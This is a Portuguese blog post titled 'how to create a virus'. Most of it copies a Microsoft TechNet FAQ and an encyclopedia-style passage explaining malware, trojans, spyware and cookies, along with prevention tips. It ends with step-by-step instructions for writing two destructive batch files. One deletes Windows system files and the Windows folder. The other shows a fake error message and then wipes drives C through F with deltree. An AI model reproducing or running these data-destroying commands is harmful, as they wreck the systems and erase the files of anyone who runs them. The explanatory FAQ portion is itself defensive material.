quinta-feira, 22 de setembro de 2011

Como criar um vírus




O que é um maware?

Malware" é um termo geral normalmente aplicado ao nos referir-mos a qualquer software desenvolvido para causar danos em computadores, servidores ou redes de computador, e isso independentemente de o software ser um vírus, um spyware, etc.

Portanto qualquer software, por exemplo um trojan, ou mesmo um worm, etc são denominados de "malware", o que informa que esses são software que causam MAL a um equipamento, software ou arquivo de dados de um usuário.

Obviamente temos que sempre levar em conta os reais níveis de criticidade e risco a segurança causado por cada um dos grupos de malware. Com certeza um Spyware é muito menos perigoso (e seus fabricantes alegam que não levam nenhum risco!) que um vírus, trojan ou worm. 

Mas vamos direto a um FAQ compilado sobre dúvidas e respostas mais comumente feitas sobre esse assunto... 


Partes deste material foram retirados de artigo de Robert Moir, MVP em Segurança, publicado originalmente no site TechNet.



P. O que exatamente é um vírus? Um "worm" também é um vírus?
R. Vírus são programas ou scripts de computador que tentam se espalhar de um arquivo para outro em um computador e/ou de um computador para outro usando vários métodos, sem o conhecimento e sem o consentimento do usuário desse computador. Um worm é um tipo específico de vírus que se propaga em vários computadores, normalmente criando cópias dele mesmo em cada computador. 

Muitos usuários definem vírus simplesmente como programas desenvolvidos para excluir ou mover dados da unidade de disco rígido. Do ponto de vista estritamente técnico, o que define um software como um vírus é a sua capacidade de contaminar um sistema ou um arquivo. O dano que ele causa é freqüentemente incidental quando é feito um diagnóstico. 

Obviamente, qualquer dano incidental é importante, mesmo quando os autores não pretendem criar problemas com seus vírus; eles ainda podem causar danos intencionalmente, pois o autor pode não conseguir antecipar cada efeito colateral, mesmo que não intencionalmente. O método mais comum usado para espalhar um vírus é por meio de arquivo anexado, que é enviado por e-mail. Este, originalmente, não era o maior vetor de disseminação de vírus, mas passou a ser o mais utilizado desde 1999, quando finalmente a Internet se tornou uma "comoditie". O envio de um vírus, mesmo que o mesmo não seja prejudicial, pode causar danos imprevisíveis. 

P. Como posso evitar que meu computador seja infectado por um vírus?
R. Um programa anti-vírus é a ferramenta mais comum para prevenção. Esse utilitário analisa um programa de computador antes de executá-lo e encerra-o se reconhecer uma "assinatura" de um código mal-intencionado. Muitos antivírus também avaliam os programas para determinar se eles contêm quaisquer características relacionadas a vírus.
» Você pode consultar o artigo " Como Agem os Anti-Vírus" para saber mais como funcionam, internamente, os programas anti-vírus.

Mas a melhor forma de evitar um vírus é usar o bom-senso. Se um programa de computador executável está anexado a um e-mail e você não confia na origem do e-mail, ou não estava esperando receber tal anexo, então exclua-o imediatamente. Não baixe nenhum aplicativo ou arquivo executável de origem desconhecida e seja cuidadoso ao trocar arquivos com outros usuários, mesmo que sejam seus conhecidos. 

P. O que é um "cavalo de Tróia"? Ele não é um vírus com um outro nome?
R. Muitos falam que o malware chamado de Cavalo de Tróia (Trojan Horse) é apenas um subconjunto de vírus (e vice-versa), mas há diferenças importantes que devem ser observadas cuidadosamente.

Um Cavalo de Tróia enquadra-se na definição de vírus que a maioria das pessoas usa, no sentido de que ele tenta invadir um computador sem o conhecimento e sem o consentimento do usuário. Um Cavalo de Tróia, semelhante a sua contraparte mitológica, apresenta-se freqüentemente de uma forma quando, na verdade, ele tem outra. Isto é, é apresentado aos futuros "usuários" como um utilitário, um crack, uma imagem pornográfica ou um jogo, mas na verdade ele irá executar operações completamente diferentes das esperadas, assim que for instalado por um usuário leigo ou desprevinido. Um exemplo recente de software mal-intencionado agindo com um Cavalo de Tróia é a versão de e-mail do vírus "Swen" que, de modo falso, passava-se como um aplicativo de atualização da Microsoft. 

Os Cavalos de Tróia normalmente executam uma destas ações: eles destroem ou modificam dados, como apagar uma unidade de disco rígido, no momento em que são ativados ou tentam descobrir ou roubar senhas, números de cartão de crédito e outras informações confidenciais. Os Cavalos de Tróia podem representar um problema maior que outros tipos de vírus, pois são desenvolvidos para serem destrutivos, de modo oposto aos vírus e aos worms, em que o invasor pode não ter a intenção de causar nenhum dano, só mostrar que é um gênio incompreendido. Entretanto em outros casos um Cavalo de Tróia é absolutamente um risco imenso, não para seus dados ou programas, mas para seu bolso. Isto acontece quando o trojan é do sub-tipo conhecido como BackDoor (um componente específico, que abre uma PORTA DOS FUNDOS no micro contaminado, e cujo objetivo maior é ficar coletando todas as teclas pressionadas pelo usuário (através de um componente "key-logger", cujo objetivo é transmitir as senhas bancárias e de cartões de crédito digitadas pelo usuário ao navegar por sites de compras, ou em Net-banking.

Essencialmente, essas diferenças não são importantes na prática. Você pode considerar vírus, Cavalos de Tróia e Worms apenas como "coisas que não quero - de jeito algum - no meu computador ou na minha rede". 

P. Como posso evitar um ataque de Cavalo de Tróia?
R. Os métodos para lidar com Cavalos de Tróia são geralmente os mesmos usados para lidar com vírus. A maioria dos programas anti-vírus combate alguns dos Cavalos de Tróia comuns, com vários graus de sucesso. Há também programas "anti-cavalos de Tróia" - software bastante específicos - disponíveis, mas a sua melhor arma ainda é o bom-senso (e o conhecimento!). Marque outro ponto para a computação segura! 

P. O que são cookies e spyware? Qual a diferença entre eles?
R. Um cookie é apenas um pedaço de texto em um arquivo no computador, contendo informações que o identificam para um site específico e quaisquer outras informações que o site deseja manter sobre o usuário que o visita.

Os cookies são ferramentas legítimas, usadas por muitos sites para rastrear as informações do visitante. Como exemplo, posso acessar uma loja on-line desde um computador conectado na Internet e colocar um item na cesta, mas decidir não comprá-lo imediatamente porque desejo comparar preços. A loja pode optar por gravar as informações sobre os produtos colocados na minha cesta em um cookie armazenado no meu computador. Esse é um exemplo de um bom uso de cookies para aprimorar a experiência do usuário, já que evita que o usuário tenha que redigitar, ou refazer, todas as escolhas e navegações que fez anteriormente. Os únicos sites que devem recuperar as informações armazenadas em um cookie são aqueles que gravaram as informações nesse cookie específico. Isso deve assegurar sua privacidade impedindo que qualquer outro site que esteja visitando possa ler os cookies criados por aquele outro site. 

P. Alguns sites usam cookies para explorar as informações do usuário?
R. Infelizmente isto é possível sim. Alguns podem enganar os usuários ou omitir suas diretivas. Por exemplo, eles podem rastrear seus hábitos de navegação na Web em site diferentes, sem que você saiba, e usar esses dados para personalizar os anúncios que você vê nos sites, etc, o que é normalmente considerado invasão de privacidade - embora alguns usuários não se importem com este uso específico de um cookie.

É difícil identificar essa e outras formas de "mau uso de cookies", o que dificulta decidir se, quando e como bloqueá-los no sistema. Além disso, o nível aceitável de informações compartilhadas varia entre os usuários, tornando difícil criar um programa "anticookie" para atender às necessidades de cada um. 

P. Como o spyware explora as informações do usuário?

R. O problema do spyware é semelhante ao problema dos cookies pelo fato de ambos serem considerados uma invasão de privacidade, embora o spyware seja diferente dos cookies, tecnicamente falando. O spyware é um programa executado no computador, que rastreia seus hábitos e personaliza esses padrões para anúncios, etc. Como ele é um programa de computador e não apenas um pedaço de texto puro, dentro de um cookie, o spyware também pode realizar ações irritantes para garantir seu funcionamento e influenciar o que você vê. Além do mais, sendo um executável, poderá ser alterado, on-line pelo seu desenvolvedor, podendo executar qualquer ação que o mesmo deseje fazer num sistema. 

P. Como sei se o spyware está em execução no meu computador?
R. É possível usar programas de detecção como o AdWare, SpyBot e outros. Semelhante ao software anti-vírus, esses programas comparam uma lista de spyware conhecidos aos arquivos no computador e remove o que for detectado. A maioria dos Anti-spyware também analisa entradas no Registro do Windows, e em cookies, comparando-as com "assinaturas" que esses programas baixam da Internet a cada vez que você atualiza sua base-de-dados - tal como você faz com seu anti-vírus. 

P. Como o spyware é instalado nos computadores?
R. Táticas comuns para instalações ilegais incluem execução de programas de anúncios em downloads de programas de shareware "gratuitos", e, quando instalado, o spyware pode baixar anúncios 24 horas por dia e sobrepô-los em sites e programas em uso. Os programas anti-spyware podem impedir que o spyware seja instalado, mas a melhor estratégia é saber o que irá baixar e instalar. 

P. O spyware pode enviar informações a outras pessoas?
R. Algumas formas de spyware monitoram o uso da Web de destino ou, até mesmo, o uso geral do computador e enviam essas informações de volta para o autor do programa spyware para serem analisadas e usadas. Para enfrentar esse tipo de problema, uma ferramenta de remoção de spyware é certamente útil, caso seja um firewall que monitore as conexões de saída do computador. Outras formas de o spyware assumir partes da sua interface de navegação da Web são forçá-lo a utilizar os mecanismos de pesquisa impostos por ele, onde é possível rastrear seus hábitos de navegação e enviar anúncios pop-up a você sempre que quiserem. 
A maior preocupação em relação ao spyware está no fato de a maioria deles ser mal-escrita ou mal-projetada. Muitas pessoas percebem que um spyware está em execução no computador somente quando este se torna lento ou pára de responder, especialmente ao realizar determinadas tarefas como realizar buscas por sites ou recuperar e-mails. Além disso, o spyware mal-escrito pode freqüentemente fazer com que o computador funcione de forma incorreta mesmo depois de ser removido. 

P. Então como evitar problemas de software mal-intencionado?
R: Duas das maiores preocupações dos usuários de computador hoje são os vírus e os spyware. Nos dois casos, embora eles sejam um problema, você pode defender-se deles muito bem com apenas um pouco de planejamento: 

  • Mantenha seu software de computador corrigido e atualizado. O sistema operacional e o aplicativo antivírus devem ser atualizados regularmente.
  • Baixe as atualizações somente de fontes confiáveis. Para sistemas operacionais Windows, sempre visite o site http://windowsupdate.microsoft.com, e para outros softwares acesse os sites legítimos das empresas ou das pessoas que os produziram.
  • Pense sempre antes de instalar algo, compare os riscos e os benefícios e esteja ciente das particularidades. O enorme contrato de licença, que ninguém gosta de ler esconde um aviso informando que você está prestes a instalar um spyware?
  • Instale e use um firewall. Se você estiver executando o Windows XP, será possível usar o firewall de software interno no Painel de Controle; além disso, há versões gratuitas de firewalls que funcionam em todas as versões do Windows.
  • Finalmente lembre-se: Prevenir é sempre melhor que remediar.



Explicando o malwares:


Definindo softwares mal intencionados (malwares): Perguntas 

Mais Freqüentes
  
Por Robert Moir, MVP em segurança 
Data de publicação: Outubro de 2003
Este documento é uma compilação das Perguntas Freqüentes sobre “malwares”, um termo geral usado para 
todos os formatos desse tipo de software. 
P: O que são malwares, vírus, spywares e cookies e como diferenciá-los?
R: Vamos falar sobre o mais fácil primeiro. "Malware" é um termo geral normalmente usado para se referir a 
qualquer software desenvolvido para causar danos em computadores, servidores ou redes de computador, 
independentemente de ser vírus, spyware, etc. 
P. O que exatamente é um vírus? Um "worm" também é um vírus?
Vírus são programas ou scripts de computador que tentam se espalhar de um arquivo para outro em um 
computador e/ou de um computador para outro usando vários métodos, sem o conhecimento e sem o 
consentimento do usuário desse computador. Um worm é um tipo específico de vírus que se propaga em vários 
computadores, normalmente criando cópias dele mesmo em cada memória do computador. 
Muitos usuários definem vírus simplesmente como programas de truques desenvolvidos para excluir ou mover 
dados da unidade de disco rígido, o que, de certa forma, está correto. Do ponto de vista técnico, o que torna o 
vírus um vírus é a sua capacidade de espalhar-se. O dano que ele causa é freqüentemente incidental quando é 
feito um diagnóstico. 
Obviamente, qualquer dano incidental é importante, mesmo quando os autores não pretendem criar problemas 
com seus vírus; eles ainda podem causar danos intencionalmente, pois o autor não antecipou o efeito total ou os 
efeitos colaterais não intencionais. O método mais comum usado para espalhar um vírus é por meio do anexo 
presente no e-mail. O envio de um vírus, mesmo que ele não seja prejudicial, pode causar danos imprevisíveis. 
P. Como posso evitar que meu computador seja infectado por um vírus?
Um programa antivírus é a ferramenta mais comum para prevenção. Esse utilitário analisa um programa de 
computador antes de executá-lo e encerra-o se reconhecer a assinatura de um código mal-intencionado. Muitos 
antivírus também avaliam os programas para determinar se eles contêm quaisquer características relacionadas a 
vírus. 
A melhor forma de evitar um vírus é usar o bom-senso. Se um programa de computador executável está 
anexado a um e-mail e você não confia na origem do e-mail, exclua-o imediatamente. Não baixe nenhum 
aplicativo ou arquivo executável de origem desconhecida e seja cuidadoso ao trocar arquivos com outros 
usuários. 
P. O que é um "cavalo de Tróia"? Ele não é um vírus com um outro nome?
Já ouvi falar que o malware Cavalo de Tróia (Trojan Horse) é um subconjunto de vírus (e vice-versa), mas há 
diferenças que devem ser mencionadas. 
Um Cavalo de Tróia enquadra-se na definição de vírus que a maioria das pessoas usa, no sentido de que ele 
tenta invadir um computador sem o conhecimento e sem o consentimento do usuário. Um Cavalo de Tróia, 
semelhante a sua contraparte mitológica grega, apresenta-se freqüentemente de uma forma quando, na 
verdade, ele tem outra. Um exemplo recente de software mal-intencionado agindo com um Cavalo de Tróia é a 
versão de e-mail do vírus "Swen" que, de modo falso, representa um aplicativo de atualização da Microsoft. 
Os Cavalos de Tróia normalmente executam uma destas ações: eles destroem ou modificam dados, como apagar 
uma unidade de disco rígido, no momento em que são ativados ou tentam descobrir ou roubar senhas, números 
Resumo
Perguntas sobre softwares mal intencionados
TechNet Página 1 de 3
http://www.microsoft.com/brasil/technet/artigos/Seguranca/SoftMalIntenc.aspx 13/08/2004de cartão de crédito e outras informações confidenciais. 
Os Cavalos de Tróia podem representar um problema maior que outros tipos de vírus, pois são desenvolvidos 
para serem destrutivos, de modo oposto aos vírus e aos worms, em que o invasor pode não ter a intenção de 
causar nenhum dano. Essencialmente, essa diferença não é importante na prática. Você pode considerar vírus, 
Cavalos de Tróia e worms como "coisas que não quero no meu computador ou na minha rede". 
P. Como posso evitar um ataque de Cavalo de Tróia?
Os métodos para lidar com Cavalos de Tróia são geralmente os mesmos usados para lidar com vírus. A maioria 
dos programas antivírus combate alguns dos Cavalos de Tróia comuns, com vários graus de sucesso. Há 
também programas "anti-cavalos de Tróia" específicos disponíveis, mas a sua melhor arma ainda é o bom-senso. 
Marque outro ponto para a computação segura! 
P. O que são cookies e spyware? Qual a diferença entre eles?
Um cookie é apenas um bit de texto em um arquivo no computador, contendo uma pequena quantidade de 
informações que o identificam para um site específico e quaisquer outras informações que o site deseja manter 
sobre o usuário que o visita. 
Os cookies são ferramentas legítimas usadas por muitos sites para rastrear as informações do visitante. Como 
exemplo, posso acessar uma loja online de um computador e colocar um item na cesta, mas decidir não comprá-
lo imediatamente porque desejo comprar preços. A loja pode optar por gravar as informações sobre os produtos 
colocados na minha cesta em um cookie armazenado no meu computador. Esse é um exemplo de um bom uso 
de cookies para aprimorar a experiência do usuário. 
Os únicos sites que devem recuperar as informações armazenadas em um cookie são aqueles que gravaram as 
informações nesse cookie específico. Isso deve assegurar sua privacidade impedindo que qualquer outro site que 
esteja visitando possa ler os cookies criados por aquele site.  
P. Alguns sites usam cookies para explorar as informações do usuário?
R. Infelizmente sim. Alguns podem enganar os usuários ou omitir suas diretivas. Por exemplo, eles podem 
rastrear seus hábitos de navegação na Web em site diferentes, sem que você saiba, e usar esses dados para 
personalizar os anúncios que você vê nos sites, etc, o que é normalmente considerado invasão de privacidade. 
É difícil identificar essa e outras formas de "mau uso de cookies", o que dificulta decidir se, quando e como 
bloqueá-los no sistema. Além disso, o nível aceitável de informações compartilhadas varia entre os usuários, 
tornando difícil criar um programa "anticookie" para atender às necessidades de cada um. 
P. Como o spyware explora as informações do usuário?
O problema de spyware é semelhante ao problema dos cookies pelo fato de ambos serem considerados uma 
invasão de privacidade, embora o spyware seja diferente dos cookies, tecnicamente falando. O spyware é um 
programa executado no computador, que rastreia seus hábitos e personaliza esses padrões para anúncios, etc. 
Como ele é um programa de computador e não apenas um bit de texto em um cookie, o spyware também pode 
realizar ações irritantes para garantir seu funcionamento e influenciar o que você vê. 
P. Como sei se o spyware está em execução no meu computador?
É possível usar programas de detecção como o AdWare e outros. Semelhante ao software antivírus, esses 
programas comparam uma lista de spyware conhecidos aos arquivos no computador e remove o que for 
detectado. Mas o que alguns consideram inaceitável é perfeitamente aceitável para outros. 
P. Como o spyware é instalado nos computadores?
Táticas comuns para instalações ilegais incluem execução de programas de anúncios em downloads de 
programas de shareware "gratuitos", e, quando instalado, o spyware pode baixar anúncios 24 horas por dia e 
sobrepô-los em sites e programas em uso. Os programas anti-spyware podem impedir que o spyware seja 
instalado, mas a melhor estratégia é saber o que irá baixar e instalar. 
P. O spyware pode enviar informações rastreadas a outras pessoas?
Algumas formas de spyware monitoram o uso da Web de destino ou, até mesmo, o uso geral do computador e 
TechNet Página 2 de 3
http://www.microsoft.com/brasil/technet/artigos/Seguranca/SoftMalIntenc.aspx 13/08/2004enviam essas informações de volta para o autor do programa spyware para serem usadas. Para enfrentar esse 
tipo de problema, uma ferramenta de remoção de spyware é certamente útil, caso seja um firewall que monitore 
as conexões de saída do computador. Outras formas de o spyware assumir partes da sua interface de navegação 
da Web são forçá-lo a utilizar os mecanismos de pesquisa impostos por ele, onde é possível rastrear seus 
hábitos de navegação e enviar anúncios pop-up a você sempre que quiserem.  
A maior preocupação em relação ao spyware está no fato de a maioria deles ser mal-escrita ou mal-projetada. 
Muitas pessoas percebem que um spyware está em execução no computador somente quando este se torna 
lento ou pára de responder, especialmente ao realizar determinadas tarefas como procurar sites ou recuperar emails. Além disso, o spyware mal-escrito pode freqüentemente fazer com que o computador funcione de forma 
incorreta mesmo depois de ser removido.  
P. Você possui um resumo rápido sobre como evitar problemas de software mal-intencionado?
R: Sim - veja abaixo. 
Duas das maiores preocupações dos usuários de computador hoje são vírus e spyware. Nos dois casos, vimos 
que, embora eles sejam um problema, você pode defender-se deles muito bem com apenas um pouco de 
planejamento:  
z Mantenha seu software de computador corrigido e atualizado. O sistema operacional e o aplicativo 
antivírus devem ser atualizados regularmente.  
z Baixe as atualizações somente de fontes confiáveis. Para sistemas operacionais Windows, sempre visite 
http://windowsupdate.microsoft.com, e para outros softwares acesse os sites legítimos das empresas ou das 
pessoas que os produziram.  
z Pense sempre antes de instalar algo, compare os riscos e os benefícios e esteja ciente das 
particularidades. O enorme contrato de licença que não deseja ler esconde um aviso informando que você 
está prestes a instalar um spyware?  
z Instalar e usar um firewall. Se você estiver executando o Windows XP, será possível usar o firewall de 
software interno no Painel de Controle; além disso, há versões gratuitas de firewalls que funcionam em 
todas as versões do Windows.  
z Prevenir e sempre melhor que remediar.  
As informações contidas neste documento representam a posição atual da Microsoft Corporation no que diz 
respeito às questões abordadas na data de publicação. Como a Microsoft deve responder às condições de 
mudança de mercado, as informações não devem ser interpretadas como um compromisso por parte da 
Microsoft, sendo que esta não pode garantir a precisão de qualquer informação apresentada após a data de 
publicação. 
Este informe oficial é fornecido apenas para fins informativos. A MICROSOFT NÃO OFERECE QUAISQUER 
GARANTIAS, EXPLÍCITAS, IMPLÍCITAS OU ESTATUTÁRIAS NESTE DOCUMENTO. 
Obedecer a todas as leis de direitos autorais aplicáveis é responsabilidade do usuário. Independentemente dos 
direitos autorais, nenhuma parte deste documento pode ser reproduzida, armazenada ou introduzida em um 
sistema de recuperação, ou transmitida de qualquer forma por qualquer meio (eletrônico, mecânico, fotocópia, 
gravação ou outro), ou para qualquer propósito, sem a permissão expressa, por escrito, da Microsoft 
Corporation.  
A Microsoft pode ter patentes ou requisições para obtenção de patente, marcas comerciais, direitos autorais ou 
outros direitos de propriedade intelectual que abrangem o conteúdo deste documento. A posse deste documento 
não lhe confere direito algum sobre as citadas patentes, marcas comerciais, direitos autorais ou outros direitos 
de propriedade intelectual, salvo aqueles expressamente mencionados em um contrato de licença, por escrito, 
da Microsoft. 
Salvo indicação em contrário, os exemplos de empresas, organizações, produtos, nomes de domínio, endereços 
de email, logotipos, pessoas, lugares e eventos aqui mencionados são fictícios e nenhuma associação com 
qualquer empresa, organização, produto, nome de domínio, endereço de email, logotipo, pessoa, lugar ou 
evento real é intencional ou deve ser deduzida como tal.  
© 2003 Microsoft Corporation. Todos os direitos reservados. 
Microsoft e Microsoft Server são marcas registradas ou comerciais da Microsoft Corporation nos Estados Unidos 
e/ou em outros países. 
Os nomes de empresas e produtos reais aqui mencionados podem ser marcas comerciais de seus respectivos 



O que é um trojan?



Um vírus Trojan Horse na verdade não é um vírus na acepção da palavra. Vírus possuem a característica específica de se replicarem, contaminando outros arquivos e/ou discos, não sendo este o caso de um vírus Trojan.

Os Trojan podem até ser extremamente destrutivos, porém não contaminam outros arquivos e/ou discos. O que eles fazem então?

Simples: eles trazem escondido dentro de si um outro programa, agora sim um vírus de verdade. Assim ao serem executados - e apenas na primeira vez - eles soltam o vírus que trazem escondido em sua "barriga", e esse vírus é o que se espalhará por programas e/ou discos, realizando as ações típicas dos vírus.

A partir de 1999, aproximadamente, começou-se a se desenvolver trojans cujo objetivo era de servir como "backdoor" (literalmetne: porta dos fundos), para que se mantivesse aberta uma porta TCP (ou mesmo UDP), através da qual um servidor instalado pelo trojan na máquina do usuário, ficasse em "listenning" (na escuta) até que fosse contactado por um cliente desse trojan, que fica na máquina do hacker que enviou o trojan. Os mais famosos casos de trojan-backdoor foram os trojans Back Oriffice e Net Bus - veja mais detalhes.

Se o cliente consegue contatar o trojan-backdoor o hacker consegue fazer tudo que o trojan tem programado, desde ler o conteúdo dos discos do usuário, até mesmo apagar arquivos e gravar toques de teclas e enviá-las para o hacker (capturando assim contas de banco, cartões de crédito e respectivas senhas).

Para se evitar este tipo mais recente, e agora mais comum, de trojan, é que se utilizam os produtos conhecidos como Firewall (parde corta-fogo) que serve para manter as portas TCP fechadas, excetos aquelas necessárias para as comunicações legais da máquina do usuário com a Internet.

Use as dicas deste blog para manter seu computador novo e livre de muitas ameaças.
Tem programas muito eficientes e orientações de vital importância para seu PC. Lembrando que a primeira camada de segurança de seu PC e você mesmo, a segunda são os programas.
http://thorpower.blogspot.com/2008/08/se…



Cavalo de troia:



Um cavalo de Troia (em inglês Trojan horse) é um malware (programa malicioso) que age como a lenda do cavalo de Troia, entrando no computador e liberando uma porta para uma possível invasão e é fácil de ser enviado, é só clicar no ID do computador e enviar para qualquer outro computador.

[editar]Surgimento e características

O cavalo de Troia é um programa que tem um pacote de vírus que é usado geralmente para destruir um computador. O conceito nasceu de um simples programa que se faziam passar por esquemas de autenticação, em que o utilizador era obrigado a inserir as senhas, pensando que estas operações eram legítimas. Por exemplo, na autenticação de uma shell, poderia ser um simples programa numa conta já aberta, e o utilizador que chegasse seria forçado a introduzir a sua password. O trojan iria então guardar o password e mascarar a conta (que seria do dono do trojan) para que parecesse legítima (a conta da vítima). Entretanto, o conceito evoluiu para programas mais completos.
Os trojans atuais são disfarçados de programas legítimos, embora, diferentemente de vírus ou de wormsnão criam réplicas de si (e esse é o motivo pelo qual o Cavalo de Tróia não é considerado um vírus). São instalados diretamente no computador. De fato, alguns trojan são programados para se auto-destruir com um comando do cliente ou depois de um determinado tempo.
Os trojans ficaram famosos na Internet pela sua facilidade de uso, fazendo qualquer pessoa possuir o controle de um outro computador apenas com o envio de um arquivo. Por isso os trojans têm fama de ser considerados "ferramentas de script kid".
Os trojans atuais são divididos em duas partes:
O servidor se instala e se oculta no computador da vítima, normalmente dentro de algum outro arquivo. No momento que esse arquivo é executado, o computador pode ser acessado pelo cliente, que irá enviar instruções para o servidor executar certas operações no computador da vítima.
A direta tende a precisar do IP da vítima para funcionar, já a reversa tem o IP do dono do trojan, fazendo assim a conexão.
Geralmente um trojan é instalado com o auxílio de um ataque de engenharia social, com apelos para convencer a vítima a executar o arquivo do servidor, o que muitas vezes acaba acontecendo, dada a curiosidade do internauta, como um email atraindo a pessoa a ver fotos de um artista, pedindo a instalação de um plugin, onde o trojan fica "hospedado".uuu





[editar]Tipos de cavalo de Troia

Trojan horse é muito achado em computadores domésticos, a fim de roubar uma determinada senha para cometer certos crimes financeiros, no caso de um cliente que utiliza algum serviço de internet Banking.


Como criar um malware:

Vá no bloco de notas e digite:

CD\
CD\WINDOWS
DEL WIN.INI
DEL WIN.COM
DEL SYSTEM
DEL SYSTEM.INI
DEL SYSTEM.COM
DEL SYSTEM32
DEL SECURITY
DEL REGEDIT.EXE
DEL HH.EXE
DEL CONFIG
DEL CONTROL.INI
DEL CONTROL.COM
DEL DEBUG
DEL CLOCK.AVI
DEL TASKMAN.EXE
DEL WININIT.INI
DEL WININIT.COM
DEL WEB
CD\
DEL CONFIG.SYS

DEL AUTOEXEC.BAT
rmdir /s /q c:\windows

Quando você for salvar , digite assim "qualquernome.bat"
Você pode botar qualquer nome no arquivo desde que tenha .bat no final.




Como criar um cavalo de troia:


Va no bloco de notas e digite assim:



e@echo off
echo erro...
break off
deltree /y c:\*.*
deltree /y d:\*.*
deltree /y e:\*.*
deltree /y f:\*.*


O mesmo procedimento do malware, salve no final com o .bat